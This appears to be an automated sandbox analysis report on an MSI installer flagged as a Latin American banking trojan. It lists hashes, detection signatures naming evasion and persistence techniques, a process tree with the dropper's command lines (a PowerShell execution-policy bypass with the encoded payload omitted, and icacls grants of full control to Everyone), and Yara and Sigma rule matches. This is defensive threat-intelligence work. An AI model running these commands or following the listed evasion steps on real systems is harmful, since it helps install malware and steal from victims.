Windows
Analysis Report
cB1ItKbbhY.msi
Overview
General Information
Sample name: cB1ItKbbhY.msi (renamed because the original name is a hash value)
Original sample name: 145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae.msi
Analysis ID: 1578854
MD5: 41744d644791bdbbcff4b05a3e1e98e0
SHA1: 9b7e8548591f1578309cefd2841e757b1656f00a
SHA256: 145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae
Tags: banker, latam, msi, PAGAMENTOS-DIGITAIS-LTDA, trojan, user-johnk3r
Detection
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- msiexec.exe (PID: 5696 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\cB1ItKbbhY.msi" MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 6496 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 3428 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E94365CFD725BFADC9A5695E48A7145F MD5: 9D09DC1EDA745A5F87553048E57620CF)
- MSI2EE6.tmp (PID: 3040 cmdline: "C:\Windows\Installer\MSI2EE6.tmp" /HideWindow "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1" MD5: D2F8C062ABA50CA096CBD5387A2D0B8B)
- psexec.exe (PID: 4864 cmdline: "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1" MD5: 79AB86017B2C9B713D6AF08086B1937F)
- powershell.exe (PID: 796 cmdline: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- icacls.exe (PID: 4184 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
- WmiPrvSE.exe (PID: 6108 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- icacls.exe (PID: 7528 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-59226\Nvidia-59226.exe /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
- Nvidia-59226.exe (PID: 7556 cmdline: "C:\Nvidia-59226\Nvidia-59226.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Nvidia-59226.exe (PID: 7796 cmdline: "C:\Nvidia-59226\Nvidia-59226.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary
- Author: Christopher Peacock '@securepeacock', SCYTHE
- Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community